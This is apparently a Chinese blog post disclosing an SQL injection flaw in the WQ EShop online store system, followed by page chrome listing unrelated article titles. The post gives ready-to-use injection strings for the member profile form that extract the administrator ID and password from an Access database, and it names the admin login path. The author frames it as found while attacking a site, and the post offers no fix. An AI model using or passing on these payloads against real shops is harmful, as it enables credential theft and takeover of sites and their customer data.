网奇EShop网上商城系统,注射漏洞
官网:http://www.wqeshop.com/
也不晓得用的人多不多..上次搞站的时候..不小心盲注出来的.
具体看过程...
注册个用户,
进入会员中心,点击“会员信息”页面进行信息修改
在表单的任何一项中都可以进入暴数据操作
暴管理员ID:l', Name = Cstr(DLookUp('memberid', 'admin')) + '
暴管理员密码:l', Name = Cstr(DLookUp('Password', 'member', 'memberid=1'))
红色的"1"字代表上一步暴出来的管理员ID
后台地址:web+/admin/
上面的方法得针对ACCESS的...当然如果是SQL的....啥都不用说了...大家都懂的.
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
教你如何搞定springboot集成kafka
原創
2024-05-16 22:58:25
容器内存可观测性新视角:WorkingSet 与 PageCache 监控
原創
2024-05-16 21:13:38
记一些CISP-PTE题目解析
原創
2024-05-11 23:51:24
Linux系统中的文件和目录权限
一、文件屬性 下文中,“文件”一詞默認代指廣義的數據類型,跟“目錄”等詞對比使用時,則專指普通文件(File)這一特定數據類型。 Linux系統中,我們可以使用命令“ls -al”來查看當前目錄
原創
2024-05-11 01:45:47
得物 ZooKeeper SLA 也可以 99.99%
原創
2024-05-10 01:06:41
O2OA(翱途)支持高斯_openGauss,瀚高_HighGo,磐维_panweidb等各种国产postgres分支数据库接入
原創
2024-05-07 22:25:47
Centos7 使用 Docker 安装 owncloud
原創
2024-05-06 23:24:42
kafka更新元数据失败问题研究
原創
2024-04-24 23:18:37
得物 ZooKeeper SLA 也可以 99.99%丨最佳实践
原創
2024-04-22 21:12:04
体验AI驱动的软件开发 | 普元低代码社区版安装流程
原創
2024-04-17 23:44:17
抢先体验:Zabbix 7.0全新Dashboard和MFA功能,增强可视化、安全性、灵活性!
原創
2024-04-17 22:13:12
【安装部署】Apache SeaTunnel 和 Web快速安装详解
原創
2024-04-16 12:22:36
用海豚调度器定时调度从Kafka到HDFS的kettle任务脚本
原創
2024-04-15 21:18:44
无用代码扫描组件设计
原創
2024-04-10 23:16:46